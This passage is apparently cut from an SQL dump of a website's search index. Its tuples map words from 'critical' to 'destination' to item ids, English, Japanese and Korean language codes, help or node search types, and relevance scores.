('critical', 76, 'en', 'help_search', 2),
('critical', 76, 'ja', 'help_search', 2),
('critical', 76, 'ko', 'help_search', 2),
('cron', 31, 'ja', 'help_search', 4),
('cron', 32, 'en', 'help_search', 127.986),
('cron', 32, 'ja', 'help_search', 127.986),
('cron', 32, 'ko', 'help_search', 127.986),
('cron', 34, 'en', 'help_search', 1),
('cron', 34, 'ja', 'help_search', 1),
('cron', 34, 'ko', 'help_search', 1),
('cron', 45, 'en', 'help_search', 2),
('cron', 45, 'ja', 'help_search', 2),
('cron', 45, 'ko', 'help_search', 2),
('cron', 67, 'en', 'help_search', 11.7259),
('cron', 67, 'ja', 'help_search', 11.7259),
('cron', 67, 'ko', 'help_search', 11.7259),
('crop', 48, 'en', 'help_search', 5),
('crop', 48, 'ja', 'help_search', 5),
('crop', 48, 'ko', 'help_search', 5),
('cropping', 35, 'en', 'help_search', 1),
('cropping', 35, 'ja', 'help_search', 1),
('cropping', 35, 'ko', 'help_search', 1),
('crucial', 140, 'en', 'node_search', 1),
('css', 29, 'en', 'help_search', 1),
('css', 29, 'ja', 'help_search', 1),
('css', 29, 'ko', 'help_search', 1),
('css', 33, 'en', 'help_search', 1),
('css', 33, 'ja', 'help_search', 1),
('css', 33, 'ko', 'help_search', 1),
('css', 37, 'en', 'help_search', 1.85135),
('css', 37, 'ja', 'help_search', 1.85135),
('css', 37, 'ko', 'help_search', 1.85135),
('cuisine', 122, 'en', 'node_search', 1),
('cultural', 174, 'en', 'node_search', 1),
('culture', 3, 'en', 'node_search', 1),
('culture', 3, 'ko', 'node_search', 1),
('culture', 24, 'en', 'node_search', 1),
('culture', 62, 'en', 'node_search', 0.842342),
('culture', 77, 'en', 'node_search', 4),
('culture', 87, 'en', 'node_search', 1),
('culture', 122, 'en', 'node_search', 1),
('cultures', 23, 'en', 'node_search', 0.848323),
('curated', 80, 'en', 'help_search', 1),
('curated', 80, 'ja', 'help_search', 1),
('curated', 80, 'ko', 'help_search', 1),
('current', 3, 'en', 'node_search', 1),
('current', 3, 'ko', 'node_search', 1),
('current', 26, 'en', 'node_search', 1),
('current', 30, 'en', 'help_search', 1),
('current', 30, 'ja', 'help_search', 1),
('current', 30, 'ko', 'help_search', 1),
('current', 53, 'en', 'help_search', 1),
('current', 53, 'ja', 'help_search', 1),
('current', 53, 'ko', 'help_search', 1),
('current', 69, 'en', 'help_search', 8),
('current', 69, 'ja', 'help_search', 8),
('current', 69, 'ko', 'help_search', 8),
('current', 91, 'en', 'help_search', 1),
('current', 91, 'ja', 'help_search', 1),
('current', 91, 'ko', 'help_search', 1),
('current', 93, 'en', 'help_search', 0.902857),
('current', 93, 'ja', 'help_search', 0.902857),
('current', 93, 'ko', 'help_search', 0.902857),
('current', 142, 'en', 'node_search', 1),
('currently', 1, 'en', 'help_search', 1),
('currently', 1, 'ja', 'help_search', 1),
('currently', 1, 'ko', 'help_search', 1),
('currently', 23, 'en', 'help_search', 1),
('currently', 23, 'en', 'node_search', 1),
('currently', 23, 'ja', 'help_search', 1),
('currently', 23, 'ko', 'help_search', 1),
('currently', 43, 'en', 'help_search', 1),
('currently', 43, 'ja', 'help_search', 1),
('currently', 43, 'ko', 'help_search', 1),
('currently', 91, 'en', 'help_search', 1),
('currently', 91, 'ja', 'help_search', 1),
('currently', 91, 'ko', 'help_search', 1),
('currently', 135, 'en', 'node_search', 1),
('currently', 155, 'en', 'node_search', 1),
('curriculum', 142, 'en', 'node_search', 1),
('custom', 36, 'en', 'help_search', 2),
('custom', 36, 'ja', 'help_search', 2),
('custom', 36, 'ko', 'help_search', 2),
('custom', 46, 'en', 'help_search', 1),
('custom', 46, 'ja', 'help_search', 1),
('custom', 46, 'ko', 'help_search', 1),
('custom', 49, 'en', 'help_search', 8),
('custom', 49, 'ja', 'help_search', 8),
('custom', 49, 'ko', 'help_search', 8),
('custom', 57, 'en', 'help_search', 1),
('custom', 57, 'ja', 'help_search', 1),
('custom', 57, 'ko', 'help_search', 1),
('custom', 92, 'en', 'help_search', 4),
('custom', 92, 'ja', 'help_search', 4),
('custom', 92, 'ko', 'help_search', 4),
('customer', 27, 'en', 'node_search', 0.63167),
('customize', 30, 'en', 'help_search', 1),
('customize', 30, 'ja', 'help_search', 1),
('customize', 30, 'ko', 'help_search', 1),
('customized', 92, 'en', 'help_search', 1),
('customized', 92, 'ja', 'help_search', 1),
('customized', 92, 'ko', 'help_search', 1),
('customizing', 29, 'en', 'help_search', 10.2416),
('customizing', 29, 'ja', 'help_search', 10.2416),
('customizing', 29, 'ko', 'help_search', 10.2416),
('customizing', 33, 'en', 'help_search', 11),
('customizing', 33, 'ja', 'help_search', 11),
('customizing', 33, 'ko', 'help_search', 11),
('customs', 24, 'en', 'node_search', 1),
('daily', 142, 'en', 'node_search', 2),
('daily', 162, 'en', 'node_search', 2),
('dar', 125, 'en', 'node_search', 28),
('dar', 125, 'ja', 'node_search', 31),
('dar', 154, 'en', 'node_search', 1),
('dar', 154, 'ja', 'node_search', 1),
('data', 11, 'en', 'help_search', 1),
('data', 11, 'ja', 'help_search', 1),
('data', 11, 'ko', 'help_search', 1),
('data', 29, 'en', 'help_search', 1),
('data', 29, 'ja', 'help_search', 1),
('data', 29, 'ko', 'help_search', 1),
('data', 30, 'en', 'help_search', 31.9136),
('data', 30, 'en', 'node_search', 2),
('data', 30, 'ja', 'help_search', 31.9136),
('data', 30, 'ko', 'help_search', 31.9136),
('data', 31, 'ja', 'help_search', 32.3651),
('data', 37, 'en', 'help_search', 6.93009),
('data', 37, 'ja', 'help_search', 6.93009),
('data', 37, 'ko', 'help_search', 6.93009),
('data', 44, 'en', 'help_search', 5),
('data', 44, 'ja', 'help_search', 5),
('data', 44, 'ko', 'help_search', 5),
('data', 62, 'en', 'help_search', 1),
('data', 62, 'ja', 'help_search', 1),
('data', 62, 'ko', 'help_search', 1),
('data', 70, 'en', 'help_search', 4),
('data', 70, 'ja', 'help_search', 4),
('data', 70, 'ko', 'help_search', 4),
('data', 86, 'en', 'help_search', 1),
('data', 86, 'ja', 'help_search', 1),
('data', 86, 'ko', 'help_search', 1),
('data', 88, 'en', 'help_search', 1),
('data', 88, 'ja', 'help_search', 1),
('data', 88, 'ko', 'help_search', 1),
('data', 90, 'en', 'help_search', 1),
('data', 90, 'ja', 'help_search', 1),
('data', 90, 'ko', 'help_search', 1),
('data', 91, 'en', 'help_search', 1),
('data', 91, 'ja', 'help_search', 1),
('data', 91, 'ko', 'help_search', 1),
('data', 93, 'en', 'help_search', 13.4291),
('data', 93, 'ja', 'help_search', 13.4291),
('data', 93, 'ko', 'help_search', 13.4291),
('database', 29, 'en', 'help_search', 1),
('database', 29, 'ja', 'help_search', 1),
('database', 29, 'ko', 'help_search', 1),
('database', 30, 'en', 'help_search', 1.85135),
('database', 30, 'ja', 'help_search', 1.85135),
('database', 30, 'ko', 'help_search', 1.85135),
('database', 34, 'en', 'help_search', 1),
('database', 34, 'ja', 'help_search', 1),
('database', 34, 'ko', 'help_search', 1),
('database', 46, 'en', 'help_search', 1),
('database', 46, 'ja', 'help_search', 1),
('database', 46, 'ko', 'help_search', 1),
('database', 67, 'en', 'help_search', 1),
('database', 67, 'ja', 'help_search', 1),
('database', 67, 'ko', 'help_search', 1),
('database', 70, 'en', 'help_search', 1),
('database', 70, 'ja', 'help_search', 1),
('database', 70, 'ko', 'help_search', 1),
('database', 76, 'en', 'help_search', 1),
('database', 76, 'ja', 'help_search', 1),
('database', 76, 'ko', 'help_search', 1),
('date', 31, 'ja', 'help_search', 2.57253),
('date', 71, 'en', 'help_search', 21),
('date', 71, 'ja', 'help_search', 21),
('date', 71, 'ko', 'help_search', 21),
('date', 92, 'en', 'help_search', 4),
('date', 92, 'ja', 'help_search', 4),
('date', 92, 'ko', 'help_search', 4),
('date', 93, 'en', 'help_search', 0.899454),
('date', 93, 'ja', 'help_search', 0.899454),
('date', 93, 'ko', 'help_search', 0.899454),
('date', 155, 'en', 'node_search', 1),
('dates', 31, 'ja', 'help_search', 1.85746),
('datetime', 31, 'ja', 'help_search', 1.71189),
('daughters', 80, 'en', 'node_search', 5),
('daughters', 87, 'en', 'node_search', 1),
('day', 4, 'en', 'node_search', 1),
('day', 4, 'ja', 'node_search', 1),
('day', 5, 'en', 'node_search', 2),
('day', 5, 'ko', 'node_search', 2),
('day', 8, 'en', 'node_search', 2),
('day', 31, 'en', 'node_search', 1),
('day', 67, 'ja', 'node_search', 31),
('day', 142, 'en', 'node_search', 1),
('days', 8, 'en', 'node_search', 2),
('days', 31, 'en', 'node_search', 1),
('days', 155, 'en', 'node_search', 1),
('days', 162, 'en', 'node_search', 1.90305),
('dear', 66, 'en', 'node_search', 1),
('death', 72, 'en', 'help_search', 4),
('death', 72, 'ja', 'help_search', 4),
('death', 72, 'ko', 'help_search', 4),
('decades', 204, 'en', 'node_search', 4),
('decades', 204, 'ja', 'node_search', 4),
('decide', 10, 'en', 'help_search', 1),
('decide', 10, 'ja', 'help_search', 1),
('decide', 10, 'ko', 'help_search', 1),
('decide', 50, 'en', 'help_search', 2),
('decide', 50, 'ja', 'help_search', 2),
('decide', 50, 'ko', 'help_search', 2),
('decision', 50, 'en', 'help_search', 1),
('decision', 50, 'ja', 'help_search', 1),
('decision', 50, 'ko', 'help_search', 1),
('dedicated', 62, 'en', 'node_search', 1),
('dedicated', 133, 'en', 'node_search', 1),
('dedicated', 135, 'en', 'node_search', 1),
('dedicated', 160, 'en', 'node_search', 1),
('dedicated', 170, 'en', 'node_search', 1),
('dedicated', 174, 'en', 'node_search', 1),
('dedication', 67, 'ja', 'node_search', 1),
('dedication', 80, 'en', 'node_search', 1),
('dedication', 135, 'en', 'node_search', 1),
('dedication', 140, 'en', 'node_search', 1),
('dedication', 160, 'en', 'node_search', 1),
('dedication', 161, 'en', 'node_search', 1),
('dedication', 165, 'en', 'node_search', 1),
('dedication', 166, 'en', 'node_search', 1),
('dedication', 169, 'en', 'node_search', 1),
('dedication', 171, 'en', 'node_search', 1),
('dedication', 176, 'en', 'node_search', 1),
('dedication', 178, 'en', 'node_search', 1),
('dedication', 179, 'en', 'node_search', 1),
('dedication', 181, 'en', 'node_search', 1),
('dedication', 182, 'en', 'node_search', 1),
('dedication', 183, 'en', 'node_search', 1),
('dedication', 185, 'en', 'node_search', 1),
('dedication', 187, 'en', 'node_search', 1),
('dedication', 188, 'en', 'node_search', 1),
('dedication', 189, 'en', 'node_search', 28),
('dedication', 190, 'en', 'node_search', 1),
('dedication', 191, 'en', 'node_search', 1),
('dedication', 192, 'en', 'node_search', 28),
('dedication', 194, 'en', 'node_search', 1),
('dedication', 196, 'en', 'node_search', 1),
('dedication', 197, 'en', 'node_search', 1),
('dedication', 198, 'en', 'node_search', 1),
('dedication', 199, 'en', 'node_search', 1),
('deducted', 31, 'en', 'node_search', 1),
('deducting', 8, 'en', 'node_search', 2),
('deepened', 122, 'en', 'node_search', 1),
('default', 7, 'en', 'help_search', 3.79839),
('default', 7, 'ja', 'help_search', 3.79839),
('default', 7, 'ko', 'help_search', 3.79839),
('default', 21, 'en', 'help_search', 43),
('default', 21, 'ja', 'help_search', 43),
('default', 21, 'ko', 'help_search', 43),
('default', 24, 'en', 'help_search', 1),
('default', 24, 'ja', 'help_search', 1),
('default', 24, 'ko', 'help_search', 1),
('default', 29, 'en', 'help_search', 0.98493),
('default', 29, 'ja', 'help_search', 0.98493),
('default', 29, 'ko', 'help_search', 0.98493),
('default', 30, 'en', 'help_search', 4.66762),
('default', 30, 'ja', 'help_search', 4.66762),
('default', 30, 'ko', 'help_search', 4.66762),
('default', 35, 'en', 'help_search', 1),
('default', 35, 'ja', 'help_search', 1),
('default', 35, 'ko', 'help_search', 1),
('default', 41, 'en', 'help_search', 2),
('default', 41, 'ja', 'help_search', 2),
('default', 41, 'ko', 'help_search', 2),
('default', 42, 'en', 'help_search', 2),
('default', 42, 'ja', 'help_search', 2),
('default', 42, 'ko', 'help_search', 2),
('default', 55, 'en', 'help_search', 5),
('default', 55, 'ja', 'help_search', 5),
('default', 55, 'ko', 'help_search', 5),
('default', 57, 'en', 'help_search', 2),
('default', 57, 'ja', 'help_search', 2),
('default', 57, 'ko', 'help_search', 2),
('default', 66, 'en', 'help_search', 8),
('default', 66, 'ja', 'help_search', 8),
('default', 67, 'en', 'help_search', 7.93972),
('default', 67, 'ja', 'help_search', 7.93972),
('default', 67, 'ko', 'help_search', 7.93972),
('default', 69, 'en', 'help_search', 1),
('default', 69, 'ja', 'help_search', 1),
('default', 69, 'ko', 'help_search', 1),
('default', 71, 'en', 'help_search', 5),
('default', 71, 'ja', 'help_search', 5),
('default', 71, 'ko', 'help_search', 5),
('default', 72, 'en', 'help_search', 1),
('default', 72, 'ja', 'help_search', 1),
('default', 72, 'ko', 'help_search', 1),
('default', 77, 'en', 'help_search', 38),
('default', 77, 'ja', 'help_search', 38),
('default', 77, 'ko', 'help_search', 38),
('default', 78, 'en', 'help_search', 1),
('default', 78, 'ja', 'help_search', 1),
('default', 78, 'ko', 'help_search', 1),
('default', 92, 'en', 'help_search', 5),
('default', 92, 'ja', 'help_search', 5),
('default', 92, 'ko', 'help_search', 5),
('defaults', 7, 'en', 'help_search', 0.913226),
('defaults', 7, 'ja', 'help_search', 0.913226),
('defaults', 7, 'ko', 'help_search', 0.913226),
('defend', 28, 'en', 'help_search', 1),
('defend', 28, 'ja', 'help_search', 1),
('defend', 28, 'ko', 'help_search', 1),
('define', 2, 'en', 'help_search', 1),
('define', 2, 'ja', 'help_search', 1),
('define', 2, 'ko', 'help_search', 1),
('define', 5, 'en', 'help_search', 1),
('define', 5, 'ja', 'help_search', 1),
('define', 5, 'ko', 'help_search', 1),
('define', 6, 'en', 'help_search', 3.9223),
('define', 6, 'ja', 'help_search', 3.9223),
('define', 6, 'ko', 'help_search', 3.9223),
('define', 29, 'en', 'help_search', 1.97685),
('define', 29, 'ja', 'help_search', 1.97685),
('define', 29, 'ko', 'help_search', 1.97685),
('define', 30, 'en', 'help_search', 1),
('define', 30, 'ja', 'help_search', 1),
('define', 30, 'ko', 'help_search', 1),
('define', 62, 'en', 'help_search', 1),
('define', 62, 'ja', 'help_search', 1),
('define', 62, 'ko', 'help_search', 1),
('defined', 4, 'en', 'help_search', 1),
('defined', 4, 'ja', 'help_search', 1),
('defined', 4, 'ko', 'help_search', 1),
('defined', 6, 'en', 'help_search', 1),
('defined', 6, 'ja', 'help_search', 1),
('defined', 6, 'ko', 'help_search', 1),
('defined', 30, 'en', 'help_search', 2),
('defined', 30, 'ja', 'help_search', 2),
('defined', 30, 'ko', 'help_search', 2),
('defined', 59, 'en', 'help_search', 1),
('defined', 59, 'ja', 'help_search', 1),
('defined', 59, 'ko', 'help_search', 1),
('defines', 6, 'en', 'help_search', 1),
('defines', 6, 'ja', 'help_search', 1),
('defines', 6, 'ko', 'help_search', 1),
('defines', 29, 'en', 'help_search', 1),
('defines', 29, 'ja', 'help_search', 1),
('defines', 29, 'ko', 'help_search', 1),
('defines', 31, 'ja', 'help_search', 1),
('defining', 5, 'en', 'help_search', 26),
('defining', 5, 'ja', 'help_search', 26),
('defining', 5, 'ko', 'help_search', 26),
('defining', 6, 'en', 'help_search', 1),
('defining', 6, 'ja', 'help_search', 1),
('defining', 6, 'ko', 'help_search', 1),
('defining', 30, 'en', 'help_search', 0.72066),
('defining', 30, 'ja', 'help_search', 0.72066),
('defining', 30, 'ko', 'help_search', 0.72066),
('defining', 35, 'en', 'help_search', 1),
('defining', 35, 'ja', 'help_search', 1),
('defining', 35, 'ko', 'help_search', 1),
('degree', 10, 'en', 'node_search', 7),
('degree', 10, 'ko', 'node_search', 7),
('degree', 24, 'en', 'node_search', 0.749958),
('degree', 24, 'ko', 'node_search', 0.729424),
('degree', 27, 'en', 'node_search', 1),
('degree', 30, 'en', 'node_search', 1),
('dekiru', 62, 'en', 'node_search', 0.860547),
('delay', 133, 'en', 'node_search', 1),
('delete', 10, 'en', 'help_search', 5),
('delete', 10, 'ja', 'help_search', 5),
('delete', 10, 'ko', 'help_search', 5),
('delete', 33, 'en', 'help_search', 1),
('delete', 33, 'ja', 'help_search', 1),
('delete', 33, 'ko', 'help_search', 1),
('delete', 37, 'en', 'help_search', 1),
('delete', 37, 'ja', 'help_search', 1),
('delete', 37, 'ko', 'help_search', 1),
('delete', 66, 'en', 'help_search', 1),
('delete', 66, 'ja', 'help_search', 1),
('delete', 69, 'en', 'help_search', 1),
('delete', 69, 'ja', 'help_search', 1),
('delete', 69, 'ko', 'help_search', 1),
('delete', 75, 'en', 'help_search', 1),
('delete', 75, 'ja', 'help_search', 1),
('delete', 75, 'ko', 'help_search', 1),
('delete', 87, 'en', 'help_search', 3),
('delete', 87, 'ja', 'help_search', 3),
('delete', 87, 'ko', 'help_search', 3),
('delete', 91, 'en', 'help_search', 1),
('delete', 91, 'ja', 'help_search', 1),
('delete', 91, 'ko', 'help_search', 1),
('delete', 93, 'en', 'help_search', 0.797402),
('delete', 93, 'ja', 'help_search', 0.797402),
('delete', 93, 'ko', 'help_search', 0.797402),
('deleted', 37, 'en', 'help_search', 1),
('deleted', 37, 'ja', 'help_search', 1),
('deleted', 37, 'ko', 'help_search', 1),
('deleted', 75, 'en', 'help_search', 1),
('deleted', 75, 'ja', 'help_search', 1),
('deleted', 75, 'ko', 'help_search', 1),
('deleted', 86, 'en', 'help_search', 28),
('deleted', 86, 'ja', 'help_search', 28),
('deleted', 86, 'ko', 'help_search', 28),
('deleting', 28, 'en', 'help_search', 0.805455),
('deleting', 28, 'ja', 'help_search', 0.805455),
('deleting', 28, 'ko', 'help_search', 0.805455),
('deleting', 66, 'en', 'help_search', 1),
('deleting', 66, 'ja', 'help_search', 1),
('deleting', 87, 'en', 'help_search', 26),
('deleting', 87, 'ja', 'help_search', 26),
('deleting', 87, 'ko', 'help_search', 26),
('deletion', 86, 'en', 'help_search', 19),
('deletion', 86, 'ja', 'help_search', 19),
('deletion', 86, 'ko', 'help_search', 19),
('delighted', 1, 'en', 'node_search', 1),
('delighted', 166, 'en', 'node_search', 1),
('delighted', 173, 'en', 'node_search', 1),
('delighted', 175, 'en', 'node_search', 1),
('delighted', 178, 'en', 'node_search', 1),
('delighted', 180, 'en', 'node_search', 1),
('delighted', 182, 'en', 'node_search', 1),
('delighted', 183, 'en', 'node_search', 1),
('delighted', 186, 'en', 'node_search', 1),
('delighted', 188, 'en', 'node_search', 1),
('delighted', 192, 'en', 'node_search', 1),
('delighted', 194, 'en', 'node_search', 1),
('delighted', 197, 'en', 'node_search', 1),
('delighted', 199, 'en', 'node_search', 1),
('delivering', 135, 'en', 'node_search', 1),
('demonstrate', 1, 'en', 'help_search', 4),
('demonstrate', 1, 'ja', 'help_search', 4),
('demonstrate', 1, 'ko', 'help_search', 4),
('demonstrate', 3, 'en', 'help_search', 4),
('demonstrate', 3, 'ja', 'help_search', 4),
('demonstrate', 3, 'ko', 'help_search', 4),
('demonstrated', 181, 'en', 'node_search', 1),
('demonstrated', 184, 'en', 'node_search', 1),
('demonstrated', 189, 'en', 'node_search', 1),
('demonstrated', 193, 'en', 'node_search', 1),
('demonstrates', 168, 'en', 'node_search', 1),
('demonstrates', 180, 'en', 'node_search', 1),
('demonstrates', 182, 'en', 'node_search', 1),
('demonstrates', 186, 'en', 'node_search', 28),
('demonstrates', 199, 'en', 'node_search', 1),
('demonstrating', 80, 'en', 'node_search', 4),
('depart', 184, 'en', 'node_search', 27),
('departed', 126, 'en', 'node_search', 1),
('departed', 154, 'en', 'node_search', 29),
('departed', 156, 'en', 'node_search', 2),
('departed', 157, 'en', 'node_search', 2),
('departed', 164, 'en', 'node_search', 2),
('departed', 165, 'en', 'node_search', 29),
('departed', 167, 'en', 'node_search', 29),
('departed', 169, 'en', 'node_search', 32),
('departed', 171, 'en', 'node_search', 5),
('departed', 173, 'en', 'node_search', 5),
('departed', 174, 'en', 'node_search', 2),
('departed', 175, 'en', 'node_search', 2),
('departed', 176, 'en', 'node_search', 2),
('departed', 177, 'en', 'node_search', 2),
('departed', 184, 'en', 'node_search', 2),
('departing', 68, 'en', 'node_search', 4),
('departing', 73, 'en', 'node_search', 1),
('departing', 157, 'en', 'node_search', 1),
('department', 27, 'en', 'node_search', 1),
('departmental', 27, 'en', 'node_search', 1),
('departure', 76, 'en', 'node_search', 4),
('departure', 78, 'en', 'node_search', 1),
('departure', 79, 'en', 'node_search', 1),
('departure', 80, 'en', 'node_search', 1),
('departure', 80, 'ja', 'node_search', 0.993146),
('departure', 111, 'en', 'node_search', 2),
('departure', 111, 'ja', 'node_search', 1),
('departure', 113, 'en', 'node_search', 2),
('departure', 113, 'ja', 'node_search', 1),
('departure', 154, 'en', 'node_search', 4),
('departure', 156, 'en', 'node_search', 27),
('departure', 157, 'en', 'node_search', 27),
('departure', 165, 'en', 'node_search', 5),
('departure', 167, 'en', 'node_search', 4),
('departure', 171, 'en', 'node_search', 4),
('departure', 173, 'en', 'node_search', 4),
('departure', 174, 'en', 'node_search', 5),
('departure', 175, 'en', 'node_search', 5),
('departure', 176, 'en', 'node_search', 5),
('departure', 177, 'en', 'node_search', 4),
('departure', 184, 'en', 'node_search', 5),
('depend', 50, 'en', 'help_search', 1),
('depend', 50, 'ja', 'help_search', 1),
('depend', 50, 'ko', 'help_search', 1),
('dependencies', 74, 'en', 'help_search', 1),
('dependencies', 74, 'ja', 'help_search', 1),
('dependencies', 74, 'ko', 'help_search', 1),
('dependent', 33, 'en', 'help_search', 1),
('dependent', 33, 'ja', 'help_search', 1),
('dependent', 33, 'ko', 'help_search', 1),
('depending', 1, 'en', 'help_search', 1),
('depending', 1, 'ja', 'help_search', 1),
('depending', 1, 'ko', 'help_search', 1),
('depending', 24, 'en', 'help_search', 1),
('depending', 24, 'ja', 'help_search', 1),
('depending', 24, 'ko', 'help_search', 1),
('depending', 32, 'en', 'help_search', 1),
('depending', 32, 'ja', 'help_search', 1),
('depending', 32, 'ko', 'help_search', 1),
('depending', 43, 'en', 'help_search', 1),
('depending', 43, 'ja', 'help_search', 1),
('depending', 43, 'ko', 'help_search', 1),
('depending', 84, 'en', 'help_search', 1),
('depending', 84, 'ja', 'help_search', 1),
('depending', 84, 'ko', 'help_search', 1),
('depends', 33, 'en', 'help_search', 1),
('depends', 33, 'ja', 'help_search', 1),
('depends', 33, 'ko', 'help_search', 1),
('deploying', 12, 'en', 'help_search', 1),
('deploying', 12, 'ja', 'help_search', 1),
('deploying', 12, 'ko', 'help_search', 1),
('deploying', 13, 'en', 'help_search', 1),
('deploying', 13, 'ja', 'help_search', 1),
('deploying', 13, 'ko', 'help_search', 1),
('deploying', 14, 'en', 'help_search', 1),
('deploying', 14, 'ja', 'help_search', 1),
('deploying', 14, 'ko', 'help_search', 1),
('deploying', 15, 'en', 'help_search', 1),
('deploying', 15, 'ja', 'help_search', 1),
('deploying', 15, 'ko', 'help_search', 1),
('deploying', 16, 'en', 'help_search', 1),
('deploying', 16, 'ja', 'help_search', 1),
('deploying', 16, 'ko', 'help_search', 1),
('deploying', 23, 'en', 'help_search', 1),
('deploying', 23, 'ja', 'help_search', 1),
('deploying', 23, 'ko', 'help_search', 1),
('deploying', 30, 'en', 'help_search', 26),
('deploying', 30, 'ja', 'help_search', 26),
('deploying', 30, 'ko', 'help_search', 26),
('deploying', 41, 'en', 'help_search', 1),
('deploying', 41, 'ja', 'help_search', 1),
('deploying', 41, 'ko', 'help_search', 1),
('deputy', 9, 'en', 'node_search', 3),
('deputy', 17, 'en', 'node_search', 4),
('derived', 57, 'en', 'help_search', 1),
('derived', 57, 'ja', 'help_search', 1),
('derived', 57, 'ko', 'help_search', 1),
('described', 30, 'en', 'help_search', 0.769219),
('described', 30, 'ja', 'help_search', 0.769219),
('described', 30, 'ko', 'help_search', 0.769219),
('described', 59, 'en', 'help_search', 1),
('described', 59, 'ja', 'help_search', 1),
('described', 59, 'ko', 'help_search', 1),
('describes', 30, 'en', 'help_search', 2),
('describes', 30, 'ja', 'help_search', 2),
('describes', 30, 'ko', 'help_search', 2),
('describes', 46, 'en', 'help_search', 1),
('describes', 46, 'ja', 'help_search', 1),
('describes', 46, 'ko', 'help_search', 1),
('description', 1, 'en', 'help_search', 1),
('description', 1, 'ja', 'help_search', 1),
('description', 1, 'ko', 'help_search', 1),
('description', 2, 'en', 'help_search', 20),
('description', 2, 'ja', 'help_search', 20),
('description', 2, 'ko', 'help_search', 20),
('description', 4, 'en', 'help_search', 1),
('description', 4, 'ja', 'help_search', 1),
('description', 4, 'ko', 'help_search', 1),
('description', 5, 'en', 'help_search', 1),
('description', 5, 'ja', 'help_search', 1),
('description', 5, 'ko', 'help_search', 1),
('description', 54, 'en', 'help_search', 4),
('description', 54, 'ja', 'help_search', 4),
('description', 54, 'ko', 'help_search', 4),
('description', 56, 'en', 'help_search', 4),
('description', 56, 'ja', 'help_search', 4),
('description', 56, 'ko', 'help_search', 4),
('description', 60, 'en', 'help_search', 4),
('description', 60, 'ja', 'help_search', 4),
('description', 60, 'ko', 'help_search', 4),
('description', 74, 'en', 'help_search', 1),
('description', 74, 'ja', 'help_search', 1),
('description', 74, 'ko', 'help_search', 1),
('description', 75, 'en', 'help_search', 5),
('description', 75, 'ja', 'help_search', 5),
('description', 75, 'ko', 'help_search', 5),
('description', 79, 'en', 'help_search', 1),
('description', 79, 'ja', 'help_search', 1),
('description', 79, 'ko', 'help_search', 1),
('descriptive', 48, 'en', 'help_search', 1),
('descriptive', 48, 'ja', 'help_search', 1),
('descriptive', 48, 'ko', 'help_search', 1),
('deserialization', 44, 'en', 'help_search', 4),
('deserialization', 44, 'ja', 'help_search', 4),
('deserialization', 44, 'ko', 'help_search', 4),
('design', 27, 'en', 'node_search', 2.50974),
('design', 28, 'en', 'help_search', 1),
('design', 28, 'ja', 'help_search', 1),
('design', 28, 'ko', 'help_search', 1),
('designed', 140, 'en', 'node_search', 1),
('designed', 155, 'en', 'node_search', 1),
('designing', 27, 'en', 'node_search', 0.913226),
('desire', 188, 'en', 'node_search', 1),
('desired', 1, 'en', 'help_search', 1),
('desired', 1, 'ja', 'help_search', 1),
('desired', 1, 'ko', 'help_search', 1),
('desired', 5, 'en', 'help_search', 1),
('desired', 5, 'ja', 'help_search', 1),
('desired', 5, 'ko', 'help_search', 1),
('desired', 7, 'en', 'help_search', 2),
('desired', 7, 'ja', 'help_search', 2),
('desired', 7, 'ko', 'help_search', 2),
('desired', 9, 'en', 'help_search', 1),
('desired', 9, 'ja', 'help_search', 1),
('desired', 9, 'ko', 'help_search', 1),
('desired', 17, 'en', 'help_search', 1),
('desired', 17, 'ja', 'help_search', 1),
('desired', 17, 'ko', 'help_search', 1),
('desired', 23, 'en', 'help_search', 0.892724),
('desired', 23, 'ja', 'help_search', 0.892724),
('desired', 23, 'ko', 'help_search', 0.892724),
('desired', 25, 'ja', 'help_search', 1),
('desired', 26, 'en', 'help_search', 1),
('desired', 26, 'ja', 'help_search', 1),
('desired', 26, 'ko', 'help_search', 1),
('desired', 28, 'en', 'help_search', 0.909743),
('desired', 28, 'ja', 'help_search', 0.909743),
('desired', 28, 'ko', 'help_search', 0.909743),
('desired', 32, 'en', 'help_search', 1),
('desired', 32, 'ja', 'help_search', 1),
('desired', 32, 'ko', 'help_search', 1),
('desired', 50, 'en', 'help_search', 1.98902),
('desired', 50, 'ja', 'help_search', 1.98902),
('desired', 50, 'ko', 'help_search', 1.98902),
('desired', 51, 'en', 'help_search', 1),
('desired', 51, 'ja', 'help_search', 1),
('desired', 51, 'ko', 'help_search', 1),
('desired', 52, 'en', 'help_search', 1),
('desired', 52, 'ja', 'help_search', 1),
('desired', 52, 'ko', 'help_search', 1),
('desired', 56, 'en', 'help_search', 1),
('desired', 56, 'ja', 'help_search', 1),
('desired', 56, 'ko', 'help_search', 1),
('desired', 57, 'en', 'help_search', 1),
('desired', 57, 'ja', 'help_search', 1),
('desired', 57, 'ko', 'help_search', 1),
('desired', 61, 'en', 'help_search', 1),
('desired', 61, 'ja', 'help_search', 1),
('desired', 61, 'ko', 'help_search', 1),
('desired', 63, 'en', 'help_search', 1),
('desired', 63, 'ja', 'help_search', 1),
('desired', 63, 'ko', 'help_search', 1),
('desired', 66, 'en', 'help_search', 2),
('desired', 66, 'ja', 'help_search', 2),
('desired', 67, 'en', 'help_search', 1),
('desired', 67, 'ja', 'help_search', 1),
('desired', 67, 'ko', 'help_search', 1),
('desired', 68, 'en', 'help_search', 0.854391),
('desired', 68, 'ja', 'help_search', 0.854391),
('desired', 68, 'ko', 'help_search', 0.854391),
('desired', 69, 'en', 'help_search', 1),
('desired', 69, 'ja', 'help_search', 1),
('desired', 69, 'ko', 'help_search', 1),
('desired', 72, 'en', 'help_search', 1),
('desired', 72, 'ja', 'help_search', 1),
('desired', 72, 'ko', 'help_search', 1),
('desired', 76, 'en', 'help_search', 1),
('desired', 76, 'ja', 'help_search', 1),
('desired', 76, 'ko', 'help_search', 1),
('desired', 83, 'en', 'help_search', 2),
('desired', 83, 'ja', 'help_search', 2),
('desired', 83, 'ko', 'help_search', 2),
('desired', 86, 'en', 'help_search', 0.997306),
('desired', 86, 'ja', 'help_search', 0.997306),
('desired', 86, 'ko', 'help_search', 0.997306),
('desiring', 66, 'en', 'node_search', 1),
('desperately', 4, 'en', 'node_search', 43),
('desperately', 4, 'ja', 'node_search', 43),
('desperately', 5, 'en', 'node_search', 3),
('desperately', 5, 'ko', 'node_search', 3),
('desperately', 10, 'en', 'node_search', 3),
('desperately', 10, 'ko', 'node_search', 3),
('desperately', 18, 'en', 'node_search', 3),
('desperately', 18, 'ko', 'node_search', 3),
('destination', 30, 'en', 'help_search', 1.58432),
('destination', 30, 'ja', 'help_search', 1.58432),
('destination', 30, 'ko', 'help_search', 1.58432),
